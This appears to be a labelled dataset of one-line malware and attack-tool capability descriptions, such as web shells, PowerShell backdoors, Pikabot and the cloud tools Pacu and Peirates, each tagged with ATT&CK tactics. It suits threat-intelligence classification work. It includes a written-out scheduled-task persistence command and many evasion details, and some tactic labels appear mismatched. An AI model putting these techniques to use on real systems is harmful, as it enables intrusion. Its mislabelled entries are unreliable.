"OwaAuth uses the filename owaauth.dll, which is a legitimate file that normally resides in %ProgramFiles%\Microsoft\Exchange Server\ClientAccess\Owa\Auth\; the malicious file by the same name is saved in %ProgramFiles%\Microsoft\Exchange Server\ClientAccess\Owa\bin\.",['TA0005:Defense Evasion']
OwaAuth has a command to timestop a file or directory.,['TA0005:Defense Evasion']
OwaAuth uses incoming HTTP requests with a username keyword and commands and handles them as instructions to perform actions.,['TA0011:Command and Control']
OwaAuth is a Web shell that appears to be exclusively used by Threat Group-3390. It is installed as an ISAPI filter on Exchange servers and shares characteristics with the China Chopper Web shell.,['TA0003:Persistence']
P.A.S. Webshell has the ability to create reverse shells with Perl scripts.,['TA0002:Execution']
P.A.S. Webshell has the ability to list and extract data from SQL databases.,['TA0009:Collection']
P.A.S. Webshell has the ability to copy files on a compromised host.,['TA0009:Collection']
P.A.S. Webshell can use a decryption mechanism to process a user supplied password and allow execution.,['TA0005:Defense Evasion']
P.A.S. Webshell can delete scripts from a subdirectory of /tmp after they are run.,['TA0005:Defense Evasion']
"P.A.S. Webshell has the ability to list files and file characteristics including extension, size, ownership, and permissions.",['TA0007:Discovery']
P.A.S. Webshell can upload and download files to and from compromised hosts.,['TA0011:Command and Control']
P.A.S. Webshell has the ability to modify file permissions.,['TA0005:Defense Evasion']
P.A.S. Webshell can display the /etc/passwd file on a compromised host.,['TA0007:Discovery']
P.A.S. Webshell can scan networks for open ports and listening services.,['TA0007:Discovery']
P.A.S. Webshell can use encryption and base64 encoding to hide strings and to enforce access control once deployed.,['TA0005:Defense Evasion']
"P.A.S. Webshell can use predefined users and passwords to execute brute force attacks against SSH, FTP, POP3, MySQL, MSSQL, and PostgreSQL services.",['TA0006:Credential Access']
P.A.S. Webshell can list PHP server configuration details.,['TA0007:Discovery']
P.A.S. Webshell can issue commands via HTTP POST.,['TA0011:Command and Control']
P.A.S. Webshell can gain remote access and execution on target web servers.,['TA0003:Persistence']
P2P ZeuS added junk data to outgoing UDP packets to peer implants.,['TA0011:Command and Control']
P8RAT can download additional payloads to a target system.,['TA0011:Command and Control']
P8RAT can send randomly-generated data as part of its C2 communication.,['TA0011:Command and Control']
P8RAT can check for specific processes associated with virtual environments.,['TA0007:Discovery']
P8RAT can check the compromised host for processes associated with VMware or VirtualBox environments.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
"P8RAT has the ability to ""sleep"" for a specified time to evade detection.","['TA0005:Defense Evasion', 'TA0007:Discovery']"
PACEMAKER can enter a loop to read `/proc/` entries every 2 seconds in order to read a target application's memory.,['TA0009:Collection']
"PACEMAKER can parse `/proc/""process_name""/cmdline` to look for the string `dswsd` within the command line.",['TA0007:Discovery']
PACEMAKER has written extracted data to `tmp/dsserver-check.statementcounters`.,['TA0009:Collection']
PACEMAKER has the ability to extract credentials from OS memory.,['TA0006:Credential Access']
PACEMAKER can use PTRACE to attach to a targeted process to read process memory.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
PACEMAKER can use a simple bash script for execution.,['TA0002:Execution']
PHOREAL is capable of manipulating the Registry.,['TA0005:Defense Evasion']
PHOREAL communicates via ICMP for C2.,['TA0011:Command and Control']
PHOREAL is capable of creating reverse shell.,['TA0002:Execution']
PITSTOP has the ability to communicate over TLS.,['TA0011:Command and Control']
PITSTOP can deobfuscate base64 encoded and AES encrypted commands.,['TA0005:Defense Evasion']
PITSTOP can listen over the Unix domain socket located at `/data/runtime/cockpit/wd.fd`.,['TA0002:Execution']
"PITSTOP can listen and evaluate incoming commands on the domain socket, created by PITHOOK malware, located at `/data/runtime/cockpit/wd.fd` for a predefined magic byte sequence. PITSTOP can then duplicate the socket for further communication over TLS.","['TA0011:Command and Control', 'TA0005:Defense Evasion', 'TA0003:Persistence']"
PITSTOP has the ability to receive shell commands over a Unix domain socket.,['TA0002:Execution']
An older variant of PLAINTEE performs UAC bypass.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
PLAINTEE has downloaded and executed additional plugins.,['TA0011:Command and Control']
PLAINTEE uses reg add to add a Registry Run key for persistence.,['TA0005:Defense Evasion']
PLAINTEE performs the tasklist command to list running processes.,['TA0007:Discovery']
PLAINTEE gains persistence by adding the Registry key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
PLAINTEE encodes C2 beacons using XOR.,['TA0011:Command and Control']
PLAINTEE collects general system enumeration data about the infected machine and checks the OS version.,['TA0007:Discovery']
PLAINTEE uses the ipconfig /all command to gather the victim’s IP address.,['TA0007:Discovery']
PLAINTEE uses cmd.exe to execute commands on the victim’s machine.,['TA0002:Execution']
PLEAD has the ability to list open windows on the compromised host.,['TA0007:Discovery']
PLEAD has the ability to steal saved passwords from Microsoft Outlook.,['TA0006:Credential Access']
"PLEAD can harvest saved credentials from browsers such as Google Chrome, Microsoft Internet Explorer, and Mozilla Firefox.",['TA0006:Credential Access']
PLEAD has the ability to delete files on the compromised host.,['TA0005:Defense Evasion']
PLEAD has the ability to list drives and files on the compromised host.,['TA0007:Discovery']
PLEAD has the ability to upload and download files to and from an infected host.,['TA0011:Command and Control']
PLEAD samples were found to be highly obfuscated with junk code.,['TA0011:Command and Control']
PLEAD has been executed via malicious e-mail attachments.,['TA0002:Execution']
PLEAD has been executed via malicious links in e-mails.,['TA0002:Execution']
PLEAD can use `ShellExecute` to execute applications.,['TA0002:Execution']
PLEAD has the ability to list processes on the compromised host.,['TA0007:Discovery']
PLEAD has the ability to proxy network communications.,['TA0011:Command and Control']
PLEAD has used RC4 encryption to download modules.,['TA0011:Command and Control']
PLEAD has used HTTP for communications with command and control servers.,['TA0011:Command and Control']
PLEAD has the ability to execute shell commands on the compromised host.,['TA0002:Execution']
POORAIM has used AOL Instant Messenger for C2.,['TA0011:Command and Control']
POORAIM has been delivered through compromised sites acting as watering holes.,['TA0001:Initial Access']
POORAIM can conduct file browsing.,['TA0007:Discovery']
POORAIM can enumerate processes.,['TA0007:Discovery']
POORAIM can perform screen capturing.,['TA0009:Collection']
"POORAIM can identify system information, including battery status.",['TA0007:Discovery']
POSHSPY encrypts C2 traffic with AES and RSA.,['TA0011:Command and Control']
POSHSPY uploads data in 2048-byte chunks.,['TA0010:Exfiltration']
POSHSPY uses a DGA to derive command and control URLs from a word list.,['TA0011:Command and Control']
POSHSPY downloads and executes additional PowerShell code and Windows binaries.,['TA0011:Command and Control']
POSHSPY appends a file signature header to encrypted data prior to upload or download.,['TA0005:Defense Evasion']
"POSHSPY uses PowerShell to execute various commands, one to execute its payload.",['TA0002:Execution']
POSHSPY modifies timestamps of all downloaded executables to match a randomly selected file created prior to 2013.,['TA0005:Defense Evasion']
POSHSPY uses a WMI event subscription to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
POWERSOURCE uses DNS TXT records for C2.,['TA0011:Command and Control']
POWERSOURCE has been observed being used to download TEXTMATE and the Cobalt Strike Beacon payload onto victims.,['TA0011:Command and Control']
"If the victim is using PowerShell 3.0 or later, POWERSOURCE writes its decoded payload to an alternate data stream named kernel32.dll that is saved in %PROGRAMDATA%\Windows\.",['TA0005:Defense Evasion']
POWERSOURCE is a PowerShell backdoor.,['TA0002:Execution']
POWERSOURCE queries Registry keys in preparation for setting Run keys to achieve persistence.,['TA0007:Discovery']
"POWERSOURCE achieves persistence by setting a Registry Run key, with the path depending on whether the victim account has user or administrator access.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
POWERSTATS has encrypted C2 traffic with RSA.,['TA0011:Command and Control']
POWERSTATS has used useless code blocks to counter analysis.,['TA0005:Defense Evasion']
"POWERSTATS uses character replacement, PowerShell environment variables, and XOR encoding to obfuscate code. POWERSTATS's backdoor code is a multi-layer obfuscated, encoded, and compressed blob. POWERSTATS has used PowerShell code with custom string obfuscation",['TA0005:Defense Evasion']
POWERSTATS can use DCOM to execute additional payloads on compromised hosts.,['TA0002:Execution']
POWERSTATS can upload files from compromised hosts.,['TA0009:Collection']
POWERSTATS can deobfuscate the main backdoor code.,['TA0005:Defense Evasion']
POWERSTATS can disable Microsoft Office Protected View by changing Registry keys.,['TA0005:Defense Evasion']
POWERSTATS can use DDE to execute additional payloads on compromised hosts.,['TA0002:Execution']
POWERSTATS has connected to C2 servers through proxies.,['TA0011:Command and Control']
"POWERSTATS can delete all files on the C:\, D:\, E:\ and, F:\ drives using PowerShell Remove-Item commands.",['TA0005:Defense Evasion']
POWERSTATS can retrieve and execute additional PowerShell payloads from the C2 server.,['TA0011:Command and Control']
POWERSTATS can use JavaScript code for execution.,['TA0002:Execution']
POWERSTATS can retrieve usernames from compromised hosts.,['TA0007:Discovery']
"POWERSTATS has created a scheduled task named ""MicrosoftEdge"" to establish persistence.",['TA0005:Defense Evasion']
POWERSTATS can use Mshta.exe to execute additional payloads on compromised hosts.,['TA0005:Defense Evasion']
POWERSTATS uses PowerShell for obfuscation and execution.,['TA0002:Execution']
POWERSTATS has used get_tasklist to discover processes on the compromised host.,['TA0007:Discovery']
POWERSTATS has established persistence through a scheduled task using the command ”C:\Windows\system32\schtasks.exe” /Create /F /SC DAILY /ST 12:00 /TN MicrosoftEdge /TR “c:\Windows\system32\wscript.exe C:\Windows\temp\Windows.vbe”.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
POWERSTATS can sleep for a given number of seconds.,['TA0010:Exfiltration']
POWERSTATS can retrieve screenshots from compromised hosts.,['TA0009:Collection']
POWERSTATS has detected security tools.,['TA0007:Discovery']
POWERSTATS encoded C2 traffic with base64.,['TA0011:Command and Control']
POWERSTATS can retrieve OS name/architecture and computer/domain name information from compromised hosts.,['TA0007:Discovery']
"POWERSTATS can retrieve IP, network adapter configuration information, and domain from compromised hosts.",['TA0007:Discovery']
POWERSTATS has the ability to identify the username on the compromised host.,['TA0007:Discovery']
POWERSTATS can use VBScript code for execution.,['TA0002:Execution']
POWERSTATS can use WMI queries to retrieve data from compromised hosts.,['TA0002:Execution']
POWERTON is written in PowerShell.,['TA0002:Execution']
POWERTON can install a Registry Run key for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
POWERTON has the ability to dump password hashes.,['TA0006:Credential Access']
POWERTON has used AES for encrypting C2 traffic.,['TA0011:Command and Control']
POWERTON has used HTTP/HTTPS for C2 traffic.,['TA0011:Command and Control']
POWERTON can use WMI for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
POWRUNER can use DNS for C2 communications.,['TA0011:Command and Control']
POWRUNER may collect user account information by running net user /domain or a series of other commands on a victim.,['TA0007:Discovery']
POWRUNER may collect domain group information by running net group /domain or a series of other commands on a victim.,['TA0007:Discovery']
POWRUNER may enumerate user directories on a victim.,['TA0007:Discovery']
POWRUNER can download or upload files from its C2 server.,['TA0011:Command and Control']
POWRUNER may collect local group information by running net localgroup administrators or a series of other commands on a victim.,['TA0007:Discovery']
POWRUNER is written in PowerShell.,['TA0002:Execution']
POWRUNER may collect process information by running tasklist on a victim.,['TA0007:Discovery']
POWRUNER may query the Registry by running reg query on a victim.,['TA0007:Discovery']
POWRUNER persists through a scheduled task that executes it every minute.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
POWRUNER can capture a screenshot from a victim.,['TA0009:Collection']
POWRUNER may collect information on the victim's anti-virus software.,['TA0007:Discovery']
POWRUNER can use base64 encoded C2 communications.,['TA0011:Command and Control']
POWRUNER may collect information about the system by running hostname and systeminfo on a victim.,['TA0007:Discovery']
POWRUNER may collect network configuration data by running ipconfig /all on a victim.,['TA0007:Discovery']
POWRUNER may collect active network connections by running netstat -an on a victim.,['TA0007:Discovery']
POWRUNER may collect information about the currently logged in user by running whoami on a victim.,['TA0007:Discovery']
POWRUNER can use HTTP for C2 communications.,['TA0011:Command and Control']
POWRUNER can execute commands from its C2 server.,['TA0002:Execution']
POWRUNER may use WMI when collecting information about a victim.,['TA0002:Execution']
PS1 can use an XOR key to decrypt a PowerShell loader and payload binary.,['TA0005:Defense Evasion']
PS1 can inject its payload DLL Into memory.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
PS1 is distributed as a set of encrypted files and scripts.,['TA0005:Defense Evasion']
CostaBricks can download additional payloads onto a compromised host.,['TA0011:Command and Control']
PS1 can utilize a PowerShell loader.,['TA0002:Execution']
PULSECHECK can base-64 encode encrypted data sent through C2.,['TA0011:Command and Control']
PULSECHECK can use Unix shell script for command execution.,['TA0002:Execution']
PULSECHECK can check HTTP request headers for a specific backdoor key and if found will output the result of the command in the variable `HTTP_X_CMD.`,['TA0011:Command and Control']
PULSECHECK is a web shell that can enable command execution on compromised servers.,['TA0003:Persistence']
PUNCHBUGGY can establish using a AppCertDLLs Registry key.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
PUNCHBUGGY has Gzipped information and saved it to a random temp file before exfil.,['TA0009:Collection']
PUNCHBUGGY has used PowerShell to decode base64-encoded assembly.,['TA0005:Defense Evasion']
PUNCHBUGGY can delete files written to disk.,['TA0005:Defense Evasion']
PUNCHBUGGY can download additional files and payloads to compromised hosts.,['TA0011:Command and Control']
PUNCHBUGGY can gather user names.,['TA0007:Discovery']
PUNCHBUGGY has saved information to a random temp file before exfil.,['TA0009:Collection']
PUNCHBUGGY mimics filenames from %SYSTEM%\System32 to hide DLLs in %WINDIR% and/or %TEMP%.,['TA0005:Defense Evasion']
PUNCHBUGGY has hashed most its code's functions and encrypted payloads with base64 and XOR.,['TA0005:Defense Evasion']
PUNCHBUGGY has used PowerShell scripts.,['TA0002:Execution']
PUNCHBUGGY has used python scripts.,['TA0002:Execution']
PUNCHBUGGY has been observed using a Registry Run key.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
PUNCHBUGGY can load a DLL using Rundll32.,['TA0005:Defense Evasion']
PUNCHBUGGY can gather AVs registered in the system.,['TA0007:Discovery']
PUNCHBUGGY can load a DLL using the LoadLibrary API.,['TA0002:Execution']
PUNCHBUGGY can gather system information such as computer names.,['TA0007:Discovery']
PUNCHBUGGY enables remote interaction and can obtain additional code over HTTPS GET and POST requests.,['TA0011:Command and Control']
PUNCHTRACK scrapes memory for properly formatted payment card data.,['TA0009:Collection']
PUNCHTRACK aggregates collected data in a tmp file.,['TA0009:Collection']
PUNCHTRACK is loaded and executed by a highly obfuscated launcher.,['TA0005:Defense Evasion']
Pacu can generate SSH and API keys for AWS infrastructure and additional API keys for other IAM users.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"Pacu can automatically collect data, such as CloudFormation templates, EC2 user data, AWS Inspector reports, and IAM credential reports.",['TA0009:Collection']
Pacu leverages the AWS CLI for its operations.,['TA0002:Execution']
"Pacu can enumerate IAM users, roles, and groups.",['TA0007:Discovery']
Pacu leverages valid cloud accounts to perform most of its operations.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Pacu can run commands on EC2 instances using AWS Systems Manager Run Command.,['TA0002:Execution']
Pacu can enumerate IAM permissions.,['TA0007:Discovery']
"Pacu can enumerate AWS infrastructure, such as EC2 instances.",['TA0007:Discovery']
Pacu can retrieve secrets from the AWS Secrets Manager via the enum_secrets module.,['TA0006:Credential Access']
"Pacu can enumerate AWS services, such as CloudTrail and CloudWatch.",['TA0007:Discovery']
"Pacu can enumerate AWS storage services, such as S3 buckets and Elastic Block Store volumes.",['TA0007:Discovery']
Pacu can create snapshots of EBS volumes and RDS instances.,['TA0005:Defense Evasion']
"Pacu can enumerate and download files stored in AWS storage services, such as S3 buckets.",['TA0009:Collection']
Pacu can allowlist IP addresses in AWS GuardDuty.,['TA0005:Defense Evasion']
"Pacu can disable or otherwise restrict various AWS logging services, such as AWS CloudTrail and VPC flow logs.",['TA0005:Defense Evasion']
"Pacu can set up S3 bucket notifications to trigger a malicious Lambda function when a CloudFormation template is uploaded to the bucket. It can also create Lambda functions that trigger upon the creation of users, roles, and groups.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Pacu can collect CloudTrail event histories and CloudWatch logs.,['TA0007:Discovery']
"Pacu can enumerate AWS security services, including WAF rules and GuardDuty detectors.",['TA0007:Discovery']
Pacu can create malicious Lambda functions.,['TA0002:Execution']
"Once inside a Virtual Private Cloud, Pacu can attempt to identify DirectConnect, VPN, or VPC Peering.",['TA0007:Discovery']
"Pacu can search for sensitive data: for example, in Code Build environment variables, EC2 user data, and Cloud Formation templates.",['TA0006:Credential Access']
Pandora can use CVE-2017-15303 to disable Windows Driver Signature Enforcement protection and load its driver.,['TA0005:Defense Evasion']
Pandora can use DLL side-loading to execute malicious payloads.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Pandora can use CVE-2017-15303 to bypass Windows Driver Signature Enforcement protection and load its driver.,['TA0004:Privilege Escalation']
Pandora can load additional drivers and files onto a victim machine.,['TA0011:Command and Control']
Pandora can write an encrypted token to the Registry to enable processing of remote commands.,['TA0005:Defense Evasion']
Pandora has the ability to compress stings with QuickLZ.,['TA0005:Defense Evasion']
Pandora can monitor processes on a compromised host.,['TA0007:Discovery']
Pandora can start and inject code into a new `svchost` process.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Pandora has the ability to install itself as a Windows service.,['TA0002:Execution']
Pandora has the ability to encrypt communications with D3DES.,['TA0011:Command and Control']
Pandora can identify if incoming HTTP traffic contains a token and if so it will intercept the traffic and process the received command.,"['TA0011:Command and Control', 'TA0005:Defense Evasion', 'TA0003:Persistence']"
Pandora can communicate over HTTP.,['TA0011:Command and Control']
Pandora has the ability to gain system privileges through Windows services.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Pasam creates a backdoor through which remote attackers can retrieve files.,['TA0009:Collection']
Pasam creates a backdoor through which remote attackers can delete files.,['TA0005:Defense Evasion']
Pasam creates a backdoor through which remote attackers can retrieve lists of files.,['TA0007:Discovery']
Pasam creates a backdoor through which remote attackers can upload files.,['TA0011:Command and Control']
Pasam establishes by infecting the Security Accounts Manager DLL to load a malicious DLL dropped to disk.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Pasam creates a backdoor through which remote attackers can retrieve lists of running processes.,['TA0007:Discovery']
Pasam creates a backdoor through which remote attackers can retrieve information such as hostname and free disk space.,['TA0007:Discovery']
Pass-The-Hash Toolkit can perform pass the hash.,"['TA0005:Defense Evasion', 'TA0008:Lateral Movement']"
Pay2Key has used RSA encrypted communications with C2.,['TA0011:Command and Control']
Pay2Key can encrypt data on victim's machines using RSA and AES algorithms in order to extort a ransom payment for decryption.,['TA0040:Impact']
Pay2Key can remove its log file from disk.,['TA0005:Defense Evasion']
Pay2Key has designated machines in the compromised network to serve as reverse proxy pivot points to channel communications with C2.,['TA0011:Command and Control']
Pay2Key has sent its public key to the C2 server over TCP.,['TA0011:Command and Control']
Pay2Key can stop the MS SQL service at the end of the encryption process to release files locked by the service.,['TA0040:Impact']
Pay2Key has the ability to gather the hostname of the victim machine.,['TA0007:Discovery']
Pay2Key can identify the IP and MAC addresses of the compromised host.,['TA0007:Discovery']
PcShare has created the `HKCU\\Software\\Classes\\CLSID\\{42aedc87-2188-41fd-b9a3-0c966feabec1}\\InprocServer32` Registry key for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
PcShare can collect files and information from a compromised host.,['TA0009:Collection']
PcShare has decrypted its strings by applying a XOR operation and a decompression using a custom implemented LZM algorithm.,['TA0005:Defense Evasion']
PcShare has been encrypted with XOR using different 32-long Base16 strings and compressed with LZW algorithm.,['TA0005:Defense Evasion']
PcShare can upload files and information from a compromised host to its C2 servers.,['TA0010:Exfiltration']
PcShare has deleted its files and components from a compromised host.,['TA0005:Defense Evasion']
PcShare has used an invalid certificate in attempt to appear legitimate.,['TA0005:Defense Evasion']
PcShare has the ability to capture keystrokes.,"['TA0009:Collection', 'TA0006:Credential Access']"
PcShare has been named `wuauclt.exe` to appear as the legitimate Windows Update AutoUpdate Client.,['TA0005:Defense Evasion']
PcShare can delete its persistence mechanisms from the registry.,['TA0005:Defense Evasion']
PcShare has used a variety of Windows API functions.,['TA0002:Execution']
PcShare can obtain a list of running processes on a compromised host.,['TA0007:Discovery']
The PcShare payload has been injected into the `logagent.exe` and `rdpclip.exe` processes.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
PcShare can search the registry files of a compromised host.,['TA0007:Discovery']
PcShare has used `rundll32.exe` for execution.,['TA0005:Defense Evasion']
PcShare can take screen shots of a compromised machine.,['TA0009:Collection']
PcShare can obtain the proxy settings of a compromised machine using `InternetQueryOptionA` and its IP address by running `nslookup myip.opendns.comresolver1.opendns.com\r\n`.,['TA0007:Discovery']
PcShare can capture camera video as part of its collection process.,['TA0009:Collection']
PcShare has used HTTP for C2 communication.,['TA0011:Command and Control']
PcShare can execute `cmd` commands on a compromised host.,['TA0002:Execution']
Pcexter has been distributed and executed as a DLL file named Vspmsg.dll via DLL side-loading.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Pcexter can upload files from targeted systems.,['TA0009:Collection']
Pcexter can upload stolen files to OneDrive storage accounts via HTTP `POST`.,['TA0010:Exfiltration']
Pcexter has the ability to search for files in specified directories.,['TA0007:Discovery']
Peirates can use stolen service account tokens to perform its operations. It also enables adversaries to switch between valid service accounts.,"['TA0005:Defense Evasion', 'TA0008:Lateral Movement']"
Peirates can use stolen service account tokens to perform its operations.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Peirates can query the query AWS and GCP metadata APIs for secrets.,['TA0006:Credential Access']
Peirates can list AWS S3 buckets.,['TA0007:Discovery']
Peirates can query the Kubernetes API for secrets.,['TA0006:Credential Access']
Peirates can use `kubectl` or the Kubernetes API to run commands.,['TA0002:Execution']
Peirates can enumerate Kubernetes pods in a given namespace.,['TA0007:Discovery']
Peirates can dump the contents of AWS S3 buckets. It can also retrieve service account tokens from kOps buckets in Google Cloud Storage or S3.,['TA0009:Collection']
"Peirates can deploy a pod that mounts its node’s root file system, then execute a command to create a reverse shell on the node.","['TA0005:Defense Evasion', 'TA0002:Execution']"
Peirates can gain a reverse shell on a host node by mounting the Kubernetes hostPath.,['TA0004:Privilege Escalation']
Peirates can initiate a port scan against a given IP address.,['TA0007:Discovery']
Peirates gathers Kubernetes service account tokens using a variety of techniques.,['TA0006:Credential Access']
Penquin can encrypt communications using the BlowFish algorithm and a symmetric key exchanged with Diffie Hellman.,['TA0011:Command and Control']
Penquin can use Cron to create periodic and pre-scheduled background jobs.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Penquin has encrypted strings in the binary for obfuscation.,['TA0005:Defense Evasion']
Penquin can execute the command code do_upload to send files to C2.,['TA0010:Exfiltration']
Penquin can delete downloaded executables after running them.,['TA0005:Defense Evasion']
"Penquin can use the command code do_vslist to send file names, size, and status to C2.",['TA0007:Discovery']
Penquin can remove strings from binaries.,['TA0005:Defense Evasion']
Penquin can execute the command code do_download to retrieve remote files from C2.,['TA0011:Command and Control']
Penquin can add the executable flag to a downloaded file.,['TA0005:Defense Evasion']
Penquin has mimicked the Cron binary to hide itself on compromised systems.,['TA0005:Defense Evasion']
Penquin can sniff network traffic to look for packets matching specific conditions.,"['TA0006:Credential Access', 'TA0007:Discovery']"
The Penquin C2 mechanism is based on TCP and UDP packets.,['TA0011:Command and Control']
Penquin installs a `TCP` and `UDP` filter on the `eth0` interface.,"['TA0011:Command and Control', 'TA0005:Defense Evasion', 'TA0003:Persistence']"
Penquin can report the file system type and disk space of a compromised host to C2.,['TA0007:Discovery']
Penquin can report the IP of the compromised host to attacker controlled infrastructure.,['TA0007:Discovery']
"Penquin will connect to C2 only after sniffing a ""magic packet"" value in TCP or UDP packets matching specific conditions.","['TA0011:Command and Control', 'TA0005:Defense Evasion', 'TA0003:Persistence']"
Penquin can execute remote commands using bash scripts.,['TA0002:Execution']
Peppy has the ability to automatically exfiltrate files and keylogs.,['TA0010:Exfiltration']
Peppy can identify specific files for exfiltration.,['TA0007:Discovery']
Peppy can download and execute remote files.,['TA0011:Command and Control']
Peppy can log keystrokes on compromised hosts.,"['TA0009:Collection', 'TA0006:Credential Access']"
Peppy can take screenshots on targeted systems.,['TA0009:Collection']
Peppy can use HTTP to communicate with C2.,['TA0011:Command and Control']
Peppy has the ability to execute shell commands.,['TA0002:Execution']
"Pikabot features several methods to evade debugging by analysts, including checks for active debuggers, the use of breakpoints during execution, and checking various system information items such as system memory and the number of processors.","['TA0005:Defense Evasion', 'TA0007:Discovery']"
"Pikabot decrypts command and control URIs using ADVobfuscator, and decrypts IP addresses and port numbers with a custom algorithm. Other versions of Pikabot decode chunks of stored stage 2 payload content in the initial payload .text section before consolidating them for further execution. Overall LunarMail is associated with multiple encoding and encryption mechanisms to obfuscate the malware's presence and avoid analysis or detection.",['TA0005:Defense Evasion']
Pikabot will gather information concerning the Windows Domain the victim machine is a member of during execution.,['TA0007:Discovery']
"Pikabot further decrypts information embedded via steganography using AES-CBC with the same 32 bit key as initial XOR operations combined with the first 16 bytes of the encrypted data as an initialization vector. Other Pikabot variants include encrypted, chunked sections of the stage 2 payload in the initial loader .text section before decrypting and assembling these during execution.",['TA0005:Defense Evasion']
"Pikabot stops execution if the infected system language matches one of several languages, with various versions referencing: Georgian, Kazakh, Uzbek, Tajik, Russian, Ukrainian, Belarussian, and Slovenian.",['TA0005:Defense Evasion']
"During the initial Pikabot command and control check-in, Pikabot will transmit collected system information encrypted using RC4.",['TA0010:Exfiltration']
Some versions of Pikabot build the final PE payload in memory to avoid writing contents to disk on the executing machine.,['TA0005:Defense Evasion']
Pikabot will retrieve the name of the user associated with the thread under which the malware is executing.,['TA0007:Discovery']
"Pikabot uses native Windows APIs to determine if the process is being debugged and analyzed, such as `CheckRemoteDebuggerPresent`, `NtQueryInformationProcess`, `ProcessDebugPort`, and `ProcessDebugFlags`. Other Pikabot variants populate a global list of Windows API addresses from the `NTDLL` and `KERNEL32` libraries, and references these items instead of calling the API items to obfuscate execution.",['TA0002:Execution']
"Pikabot uses non-standard ports, such as 2967, 2223, and others, for HTTPS command and control communication.",['TA0011:Command and Control']
"Pikabot, following payload decryption, creates a process hard-coded into the dropped and injects the decrypted core modules into it.","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"Pikabot reflectively loads stored, previously encrypted components of the PE file into memory of the currently executing process to avoid writing content to disk on the executing machine.",['TA0005:Defense Evasion']
Pikabot maintains persistence following system checks through the Run key in the registry.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Pikabot uses base64 encoding in conjunction with symmetric encryption mechanisms to obfuscate command and control communications.,['TA0011:Command and Control']
"Pikabot loads a set of PNG images stored in the malware's resources section , each with an encrypted section containing portions of the core Pikabot core module. These sections are loaded and decrypted using a bitwise XOR operation with a hardcoded 32 bit key.",['TA0005:Defense Evasion']
Earlier Pikabot variants use a custom encryption procedure leveraging multiple mechanisms including AES with multiple rounds of Base64 encoding for its command and control communication. Later Pikabot variants eliminate the use of AES and instead use RC4 encryption for transmitted information.,['TA0011:Command and Control']
"Pikabot performs a variety of system checks to determine if it is running in an analysis environment or sandbox, such as checking the number of processors , and the amount of RAM .","['TA0005:Defense Evasion', 'TA0007:Discovery']"
"Pikabot performs a variety of system checks and gathers system information, including commands such as whoami.",['TA0007:Discovery']
Pikabot gathers victim network information through commands such as ipconfig and ipconfig /all.,['TA0007:Discovery']
"Pikabot can create a suspended instance of a legitimate process , allocate memory within the suspended process corresponding to Pikabot's core module, then redirect execution flow via `SetContextThread` API so that when the thread resumes the Pikabot core module is executed.","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Pikabot can execute Windows shell commands via cmd.exe.,['TA0002:Execution']
Pillowmint has used a malicious shim database to maintain persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Pillowmint has encrypted stolen credit card information with AES and further encoded it with Base64.,['TA0009:Collection']
Pillowmint has used the NtQueueApcThread syscall to inject code into svchost.exe.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Pillowmint can uninstall the malicious service from an infected machine.,['TA0005:Defense Evasion']
Pillowmint has collected credit card data using native API functions.,['TA0009:Collection']
Pillowmint has been decompressed by included shellcode prior to being launched.,['TA0005:Defense Evasion']
Pillowmint has deleted the filepath %APPDATA%\Intel\devmonsrv.exe.,['TA0005:Defense Evasion']
Pillowmint has stored a compressed payload in the Registry key HKLM\SOFTWARE\Microsoft\DRM.,['TA0005:Defense Evasion']
Pillowmint has modified the Registry key HKLM\SOFTWARE\Microsoft\DRM to store a malicious payload.,['TA0005:Defense Evasion']
Pillowmint has used multiple native Windows APIs to execute and conduct process injections.,['TA0002:Execution']
Pillowmint has been compressed and stored within a registry key. Pillowmint has also obfuscated the AES key used for encryption.,['TA0005:Defense Evasion']
Pillowmint has used a PowerShell script to install a shim database.,['TA0002:Execution']
Pillowmint can iterate through running processes every six seconds collecting a list of processes to capture from later.,['TA0007:Discovery']
Pillowmint has used shellcode which reads code stored in the registry keys \REGISTRY\SOFTWARE\Microsoft\DRM using the native Windows API as well as read HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces as part of its C2.,['TA0007:Discovery']
"PinchDuke steals credentials from compromised hosts. PinchDuke's credential stealing functionality is believed to be based on the source code of the Pinch credential stealing malware . Credentials targeted by PinchDuke include ones associated with many sources such as The Bat!, Yahoo!, Mail.ru, Passport.Net, Google Talk, and Microsoft Outlook.",['TA0006:Credential Access']
